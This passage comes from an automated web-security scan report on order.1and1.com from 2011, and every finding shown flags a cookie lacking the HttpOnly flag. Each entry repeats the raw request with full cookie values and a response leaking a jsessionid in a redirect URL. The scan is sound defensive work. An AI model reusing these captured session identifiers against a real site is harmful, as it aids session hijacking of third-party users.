Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:46:10 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Kcmc3OjsxWlpaVGddZCpiXCkbJXVoYjpRRD4mKicnJiQmJCEhJCMdICQXMC8uK1A+al9hbycpJFQtV2YsHyAcGyAzMTQyLDQrKjNrbDInLl5nLSAhHRwhHjI1MDM0LS4=; Expires=Fri, 07-Apr-2079 22:00:17 GMT; Path=/
ETag: b2159134fd54a5eff19566bcc53f235d
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20771


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.56. http://order.1and1.com/xml/order/FeatureSecurityCertificate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSecurityCertificate

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSecurityCertificate HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:46:03 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=4ca34797f0aac000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSecurityCertificate;jsessionid=AF4A8D88496B07F20D4A4A282F3FA19A.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.57. http://order.1and1.com/xml/order/FeatureServerDedOsLinux  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerDedOsLinux

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerDedOsLinux HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:48:41 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=159733db96707000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerDedOsLinux;jsessionid=BEB715C3D0AD4FDF3308D32B2D75EEB7.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.58. http://order.1and1.com/xml/order/FeatureServerDedOsLinuxOpt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerDedOsLinuxOpt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerDedOsLinuxOpt HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:48:13 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=7f477cb0efbac400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerDedOsLinuxOpt;jsessionid=8F4D34F8BF464D4825D77320209A42D0.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.59. http://order.1and1.com/xml/order/FeatureServerDedOsWindows  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerDedOsWindows

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerDedOsWindows HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:49:02 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=610a8252a61f9c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerDedOsWindows;jsessionid=DCE280F7AFB46473EAD17002BC2D67DE.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.60. http://order.1and1.com/xml/order/FeatureServerDedOsWindowsOpt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerDedOsWindowsOpt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerDedOsWindowsOpt HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:48:14 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=87e626148423c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerDedOsWindowsOpt;jsessionid=857A245A566851E43E294A4EDDB81C35.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.61. http://order.1and1.com/xml/order/FeatureServerFirewall  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerFirewall

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerFirewall HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:49:46 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=2a662dae85f36400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerFirewall;jsessionid=A860AD88F46B29A5B4DEFDFDCEF7F2EA.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.62. http://order.1and1.com/xml/order/FeatureServerHarddrive  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerHarddrive

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerHarddrive HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:51:56 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=3615648872672000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerHarddrive;jsessionid=8192B227548EAC6F717DC5CF967F86A5.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.63. http://order.1and1.com/xml/order/FeatureServerMonitoring  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerMonitoring

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerMonitoring HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:50:25 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=2f065831d35d1400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerMonitoring;jsessionid=49458D6E362E5ABB5A84001887BEC3BE.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.64. http://order.1and1.com/xml/order/FeatureServerMonitoringCloud  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerMonitoringCloud

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerMonitoringCloud HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:48:10 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=4d33fa49f0c72000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerMonitoringCloud;jsessionid=A4CBB6C182353045EF0AA3B3DB343B02.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.65. http://order.1and1.com/xml/order/FeatureServerProcessor  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerProcessor

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerProcessor HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:48:23 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=52d42869220c5000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerProcessor;jsessionid=4E645A6B42402C8902E266243290193B.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.66. http://order.1and1.com/xml/order/FeatureServerRecovery  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerRecovery

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerRecovery HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:49:35 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=2ee9ff185893a000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerRecovery;jsessionid=FF636E41CA9B345C50F315CAEB1B41EE.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.67. http://order.1and1.com/xml/order/FeatureServerSsl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerSsl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerSsl HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:49:43 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=2c6856928977d800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerSsl;jsessionid=4162E685F59ACF37EFCE2B660FED94F4.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.68. http://order.1and1.com/xml/order/FeatureServerVpsOsLinux  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerVpsOsLinux

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerVpsOsLinux HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
